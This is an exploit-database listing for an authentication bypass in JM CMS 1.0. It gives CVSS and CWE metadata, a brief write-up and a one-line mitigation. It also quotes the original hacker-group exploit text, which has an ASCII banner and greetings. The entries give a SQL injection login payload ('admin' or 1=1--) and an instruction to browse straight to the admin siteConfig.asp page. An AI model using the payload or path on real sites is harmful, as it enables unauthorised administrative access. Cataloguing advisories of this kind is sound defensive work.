header-logo
Suggest Exploit
vendor:
JM CMS
by:
./Red-D3v1L
8.8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: JM CMS
Affected Version From: 1
Affected Version To: 1
Patch Exists: No
Related CWE: N/A
CPE: a:designsbyjm:jm_cms:1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2019

JM CMS 1.0 <== 1.0 (Auth Bypass) SQL Injection Vulnerability

JM CMS 1.0 is vulnerable to an authentication bypass vulnerability due to improper sanitization of user-supplied input. An attacker can exploit this vulnerability by supplying a specially crafted username parameter in the login form. By supplying a username parameter of 'admin' or 1=1--, an attacker can bypass authentication and gain access to the administrative panel.

Mitigation:

Ensure that user-supplied input is properly sanitized and validated before being used in an application.
Source

Exploit-DB raw data:

      _ _ _ _  _ _ _   _ _ _ _    _ _ _    __  _ _ _ _               _____1337~h4x0rZ__   _        ___    ___
    /_/Rd_ _ /   _ _\/   _ _ /   \      \<   |/_ _   /         /\   |     \    /\  ||   \( )   /\  |  \  (| |
    \_ _ _ _/  /_ _ /  /      __ |  ()  / |  |  /   / [d0t]com/@~\  | (O) /   /+~\ ||_O_|( )  /0O\ |   \  | |
     _ _ _ _\  \_ _ \  \ _ _ _   |     \  |  | /   /_ _      /|__|\ |     \  /|__|\|| O |( ) /+__+\| ^  \ | |
   /_ _ _ _ _\ _ _ _/\ _ _ _ /   |__|\__\ |__|/_ _ _ _ _\   /\|  |/\|__|\__\( )  ( )|___/(_)/\|  |/\__\__\|_ >

==============================================================================
        [?] ~ Note : Hacker R0x Lamerz Sux !
==============================================================================
        [?]  JM CMS 1.0  <== 1.0 (Auth Bypass) SQL Injection Vulnerability
==============================================================================
    [?] my home:              [ http://sec-r1z.com ]
    [?] Script:               [ JM CMS 1.0 ]
    [?] Language:             [ ASP ]
    [?] Vendor              [http://designsbyjm.net ]
    [?] Founder:              [ ./Red-D3v1L ]
    [?] Gr44tz to:            [ sec-r1z# Crew - Hackteach Team - my love :$ ]
    
########################################################################
 
===[ Exploit SQL Bypass ]=== 
 
 [»] Go to : [Path]/admin

 [»] Add : siteConfig.asp

 [»] dem0 :

 http://server/admin/siteConfig.asp